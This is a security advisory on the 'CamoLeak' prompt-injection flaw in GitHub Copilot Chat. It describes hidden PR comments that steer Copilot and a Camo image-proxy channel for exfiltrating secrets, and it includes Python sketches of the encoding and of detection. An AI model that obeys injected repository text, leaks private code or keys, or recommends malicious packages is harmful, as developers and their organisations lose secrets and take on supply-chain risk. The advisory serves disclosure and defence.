October 13, 2025

CamoLeak prompt injection in GitHub Copilot Chat enables private code & secret exfiltration

A critical vulnerability in GitHub Copilot Chat (“CamoLeak”) allowed attackers to silently exfiltrate private repository content and secrets.

Summary

A critical vulnerability in GitHub Copilot Chat (“CamoLeak”) allowed attackers to silently exfiltrate private repository content and secrets and to steer Copilot’s responses to suggest malicious packages/links. The attack combined remote prompt injection (via hidden PR comments) with a novel CSP bypass leveraging GitHub’s own Camo image proxy infrastructure to render attacker-controlled, but policy-compliant, image URLs that carried encoded data out of the victim’s browser.

What’s Affected

  • GitHub Copilot Chat sessions that ingest repository context (PR descriptions, comments, issues, commits) including hidden PR comments.
  • Any user who opens/uses Copilot Chat on a page containing the injected prompt (attacker and victim can be different users/roles).
  • The vulnerability abused the victim’s own permissions (Copilot runs with the requester’s access).

Attack Method (How It Worked)

  1. Remote Prompt Injection via Hidden PR Comment
    • Attacker submits a PR containing an invisible/hidden comment with instructions aimed at Copilot Chat.
    • Any user who later views the PR and asks Copilot Chat to summarize or explain it causes Copilot to ingest the hidden text and execute the attacker’s instructions.
  2. Response Control & Malicious Suggestions
    • Injected instructions can direct Copilot to recommend malicious dependencies, links, or code snippets, influencing developer behavior.
  3. CSP Bypass via Camo (Exfil Channel)
    • GitHub rewrites external image URLs through Camo (https://camo.githubusercontent.com/…) with signed URLs that are allowed by Content Security Policy.
    • The researcher pre-generated a dictionary of valid Camo-signed image URLs (1×1 transparent pixels) for an alphabet of characters/symbols.
    • The injected prompt coerces Copilot into rendering “ASCII art” built from those Camo images, ordered so that the sequence encodes private data (e.g., code fragments, secrets).
    • The victim’s browser fetches each Camo URL (allowed by CSP); the attacker’s origin server behind those URLs observes the ordered requests and reconstructs the exfiltrated payload from the pattern (optionally varied with random query parameters to defeat caching).
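The encoding channel in step 3 can be sketched as follows. This is a minimal illustration, not the researcher’s actual PoC: the Camo URL “digests” below are made-up placeholders (real Camo URLs carry HMAC signatures issued by GitHub), and the alphabet is deliberately small.

```python
# Sketch of the Camo-pixel exfil channel: one pre-signed 1x1 pixel URL per
# character, ordered so the rendered image sequence spells out the secret.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789_"

# Attacker pre-generates a dictionary of valid Camo-signed pixel URLs.
# (Digests here are fake placeholders, not real Camo signatures.)
CAMO_DICT = {
    ch: f"https://camo.githubusercontent.com/fake-digest-{i:02d}/pixel.png"
    for i, ch in enumerate(ALPHABET)
}
URL_TO_CHAR = {url: ch for ch, url in CAMO_DICT.items()}

def encode(secret: str) -> list[str]:
    """Order the per-character pixel URLs so the sequence encodes the secret."""
    return [CAMO_DICT[ch] for ch in secret if ch in CAMO_DICT]

def render_markdown(urls: list[str]) -> str:
    """What the injected prompt asks Copilot to emit: a row of 'ASCII art' images."""
    return "".join(f"![]({u})" for u in urls)

def decode(requested_urls: list[str]) -> str:
    """Attacker side: rebuild the payload from the order of incoming fetches."""
    return "".join(URL_TO_CHAR.get(u, "?") for u in requested_urls)
```

Because every URL is a legitimately signed `camo.githubusercontent.com` resource, each individual fetch is CSP-compliant; only the ordering carries the stolen data, which is why disabling image rendering (GitHub’s fix) closes the channel.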

Impact

  • Data exposure: private source code, issue content (including zero-days), credentials/keys (e.g., “AWS_KEY”), internal design docs.
  • Supply-chain risk: Copilot may recommend malicious packages (e.g., copilotevil), tainting codebases.
  • Cross-tenant risk: Any developer who views affected PRs/issues can be impacted if Copilot Chat is used; least-privilege violations occur via the victim’s own access.

Detection & Hunting

  • Repo artifacts: Search PRs/issues for hidden comments or unusual markdown that references images, Camo URLs, or odd “games/tasks”.
  • Copilot transcripts (if retained): Look for responses containing long image sequences, unexpected package recommendations, or instructions clearly not authored by the developer.
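A hedged hunting sketch for the two artifacts above, run over exported comment bodies or retained transcripts as plain text. The patterns and the 10-image threshold are assumptions to tune for your environment, not official indicators of compromise.

```python
# Flag text bodies containing hidden HTML comments or long runs of Camo
# image references, the artifacts a CamoLeak-style injection leaves behind.
import re

HIDDEN_COMMENT = re.compile(r"<!--.*?-->", re.DOTALL)
CAMO_IMAGE = re.compile(
    r"!\[[^\]]*\]\(https://camo\.githubusercontent\.com/[^)]+\)"
)

def suspicious(body: str, camo_threshold: int = 10) -> list[str]:
    """Return a list of findings for one PR/issue comment or transcript body."""
    findings = []
    if HIDDEN_COMMENT.search(body):
        findings.append("hidden HTML comment present")
    camo_hits = CAMO_IMAGE.findall(body)
    if len(camo_hits) >= camo_threshold:
        findings.append(
            f"{len(camo_hits)} Camo image references (possible exfil sequence)"
        )
    return findings
```

Note the caveat: GitHub normally rewrites external images to Camo only at render time, so raw API comment bodies contain Camo URLs mainly when an attacker embedded pre-signed ones directly, as in this attack.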

Timeline

  • June 2025: Vulnerability discovered and reported via HackerOne.
  • Aug 14, 2025: GitHub ships a fix: image rendering is disabled in Copilot Chat, neutralizing the Camo-based exfiltration channel.
  • Oct 8, 2025: Public disclosure with technical details and PoC.

Why It Matters

CamoLeak shows how AI-in-the-workflow multiplies attack surfaces: not only direct prompts, but all ingested repo context can carry executable instructions for an LLM agent. Even strong CSPs can be sidestepped using platform-native proxies.
